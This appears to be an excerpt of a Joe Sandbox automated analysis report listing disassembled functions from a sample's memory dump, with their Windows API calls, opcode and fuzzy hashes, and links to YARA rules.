API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
Instruction ID: f8d267cd5d77e5b89b9439b92fb6138c1fb5de3267d8e2d05ab07f3f070665dd
Opcode Fuzzy Hash: dec23c1ece902c723340c7efb16c4e9d5089c2f77b2001fed0852d1faaa2db55
Instruction Fuzzy Hash: EF4106B0805B40DEE724DF7984899E7FAE5FF18310F504A2ED2EE83282DB366554CB15

Function 007FB188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 007F8FA5: GetLastError.KERNEL32(?,00810EE8,007F3E14,00810EE8,?,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F8FA9
Part of subcall function 007F8FA5: _free.LIBCMT ref: 007F8FDC
Part of subcall function 007F8FA5: SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F901D
Part of subcall function 007F8FA5: _abort.LIBCMT ref: 007F9023

Part of subcall function 007FB2AE: _abort.LIBCMT ref: 007FB2E0
Part of subcall function 007FB2AE: _free.LIBCMT ref: 007FB314

Part of subcall function 007FAF1B: GetOEMCP.KERNEL32(00000000,?,?,007FB1A5,?), ref: 007FAF46

_free.LIBCMT ref: 007FB200
_free.LIBCMT ref: 007FB236

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
Instruction ID: b33b6434c2a7a9b86840055b15e309201e92f561fbc0821c7cba5c323795c14d
Opcode Fuzzy Hash: aff3a4c4409b16c0bff8c27e233a9c19d2f45d80d7603bf48fb2aef3b2becb16
Instruction Fuzzy Hash: D631C13190420CEFDB10EFA9C845A7E77E5FF41320F254099EA249B391DB799D41CB41

Function 007D971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007D9EDC,?,?,007D7867), ref: 007D97A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007D9EDC,?,?,007D7867), ref: 007D97DB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
Instruction ID: a7be6e160c0a797ba1881c293bdaaf7ad78b2222fe351d72cdc7b07636417dc5
Opcode Fuzzy Hash: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
Instruction Fuzzy Hash: 6F21F6B1510749EFD7308F24C885BA7B7F8EB49764F00492EF6E582291C378AC448B61

Function 007D9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007D7547,?,?,?,?), ref: 007D9D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 007D9E2C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
Instruction ID: e840f13a46dd9446670ee9992a2389912be2122b977507339445bbe795280b21
Opcode Fuzzy Hash: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
Instruction Fuzzy Hash: E221F671249286ABC714DE25C851AABBBF5AF55304F04081EB5C083241D32DDA0CCBA1

Function 007FA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 007FA4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 007FA4C5

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
Instruction ID: ea0cd2124e9baba6c5fcda9e919fe1f5e22ad9b8828e52549f8e9eda983a4e04
Opcode Fuzzy Hash: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
Instruction Fuzzy Hash: D5113A73601268ABDF25DF2CEC4887B7395BB943207164520FE19AB354EA78DC01C6D2

Function 007D9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,007D9B35,?,?,00000000,?,?,007D8D9C,?), ref: 007D9BC0
GetLastError.KERNEL32 ref: 007D9BCD

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
Instruction ID: dc0bc67f240c72d446fa22e36d5d8843156aba400e8971eb4bffcb594e4046a5
Opcode Fuzzy Hash: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
Instruction Fuzzy Hash: C60104B13042059B8B08CE65AD8497EB3B9AFC0721B15462FFA1383390CA79D8059B20

Function 007D9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 007D9E76
GetLastError.KERNEL32 ref: 007D9E82

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
Instruction ID: 75938dffe432844f67b484ad16b223018693ea760d0e47112c66c9efc0085c70
Opcode Fuzzy Hash: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
Instruction Fuzzy Hash: F801B5723056006BEB34DF29DD4876BB7EDAB84314F144A3FB246C3780DA79DC488610

Function 007F8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007F8627

Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00810F50,007DCE57,?,?,?,?,?,?), ref: 007F8663

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
Instruction ID: 95b363fd543ce2c126059d45235283deac81dd608c2cfd378de41eff7ff5652f
Opcode Fuzzy Hash: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
Instruction Fuzzy Hash: 2AF0C23220511DA6DBE12B21AC09B7F27589FD1BB0F284215FB14DA393DF2CC80095A7

Function 007E0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 007E0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 007E091C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
Instruction ID: 1352f4b084a0b935ddc22d547cd580aea36a20040430f29959ccc788bc23813b
Opcode Fuzzy Hash: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
Instruction Fuzzy Hash: 16E09B32A12145BBBF05CEA59C044BB739DEB0C2107104179A806D3103F678FD4186E0

Function 007F79B7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 007FB610: GetEnvironmentStringsW.KERNEL32 ref: 007FB619
Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007FB63C
Part of subcall function 007FB610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007FB662
Part of subcall function 007FB610: _free.LIBCMT ref: 007FB675
Part of subcall function 007FB610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007FB684

_free.LIBCMT ref: 007F79FD
_free.LIBCMT ref: 007F7A04

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
Instruction ID: 5733711445741a055b37747cd1b49964e846b1c75fcb63c6b39193e919212b0e
Opcode Fuzzy Hash: 4823ccd0addf04a49dcaf3f18ba1bfddf69d87e677e880cb2321af2210cd67e0
Instruction Fuzzy Hash: 9AE0E55350D54E81DBA5B67A6C0E67F0204ABC1731B110B1AFB20DB3C2CE5C88024096

Function 007DA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
Instruction ID: ec23b3f99013ceff26b07e8f0d1722076c11de68727335270a11263c37a729b9
Opcode Fuzzy Hash: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
Instruction Fuzzy Hash: 07F0A03124124DBBDF016F60DC05FDA376CBB08381F048056BC8886261DB7ACAA8AA50

Function 007ED573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007ED5A1
SetDlgItemTextW.USER32(00000065,?), ref: 007ED5B8

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: d02f916f0f987c734cb1dc526c1d8c9875e65367988a84867e2208cb89171ebe
Instruction ID: b86bce6cfe27e7a1391e24f01d2df9ec88ec75f6c7eb30c18932ca0b27b8e64f
Opcode Fuzzy Hash: d02f916f0f987c734cb1dc526c1d8c9875e65367988a84867e2208cb89171ebe
Instruction Fuzzy Hash: 40F0EC71501388FBEB21AB71DC0BF9D376DAB08745F040996B601571B1DD796E604761

Function 007DA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA16C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3044daa490ad1edef040af772a55fad2ab11058a532d9ba6e7d25458c89fa820
Instruction ID: 649b4f6cb4527e47382fc1b874e42392aab33d85a593e499bc61acdc02a12625
Opcode Fuzzy Hash: 3044daa490ad1edef040af772a55fad2ab11058a532d9ba6e7d25458c89fa820
Instruction Fuzzy Hash: B1E0923564120DFBDB11AF60DC45FE9777CBB08381F484066B888D3160DB66DD94AA90

Function 007EA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00801FA1,000000FF), ref: 007EA3D1
CoUninitialize.COMBASE(?,?,?,?,00801FA1,000000FF), ref: 007EA3D6

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 6e96a93e8157435f22b2bf0e09fc10b61f048006e0ce75ac1c9904cc1affa1ea
Instruction ID: 187a7cf63562499106b46eafe161c19f7e81183cb8916ff57846604d0fface92
Opcode Fuzzy Hash: 6e96a93e8157435f22b2bf0e09fc10b61f048006e0ce75ac1c9904cc1affa1ea
Instruction Fuzzy Hash: E6F03072518655DFC7109B4DDD05B59FBADFB89B20F04476AF41983760CF786800CA91

Function 007DA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1D1

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 14c6d479bcc3bf11c7901d2df70434594fd0ef1f472dc123b44827120fda65b4
Instruction ID: d0645e11baa533cfbc04b21d6167f185061dd24fd9596f61d52f004ce5cfc6cb
Opcode Fuzzy Hash: 14c6d479bcc3bf11c7901d2df70434594fd0ef1f472dc123b44827120fda65b4
Instruction Fuzzy Hash: 7CE06D35501128ABDB20AA689C09BD9B77CBB083A1F0442A2BD44E3290DA75DD449AE0

Function 007E0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 84a7d57b56959d2391fa9d289ffad15d20f34203d60d63abfcb262edb338a36c
Instruction ID: 9870f2bf43929fec3547b680b8fad0aa1e41aeaf072f542308f281c33b0684a7
Opcode Fuzzy Hash: 84a7d57b56959d2391fa9d289ffad15d20f34203d60d63abfcb262edb338a36c
Instruction Fuzzy Hash: 9FE0127690255CAADB619AA59C09FD6776CFF0D392F0404A6B948D3104DAB49A848BE0

Function 007E9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007E9B37

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 5345c47e3e4aba66376bd9af367d9665036040d1bf721cb246798f33c3f1ad93
Instruction ID: 57b6edf6704ef0cef6344256f7ad4da7a39d94b81f4bb34f8c72ba63c8a0fb5f
Opcode Fuzzy Hash: 5345c47e3e4aba66376bd9af367d9665036040d1bf721cb246798f33c3f1ad93
Instruction Fuzzy Hash: E7E0EDB2902218EBDB50DF99D905699B7ECEB08321F20845BE99593700E6B56E049B91

Function 007F215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 007F329A: try_get_function.LIBVCRUNTIME ref: 007F32AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007F2185

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 641f3e41c02c0dba7b39520f53f9ab26b89a96cff389e1c2eeb8fbd4a0776dce
Instruction ID: c80785df67374696d0d3852fc0bbc846f1cf9e6f2b4b5a2e3a8061be58afd124
Opcode Fuzzy Hash: 641f3e41c02c0dba7b39520f53f9ab26b89a96cff389e1c2eeb8fbd4a0776dce
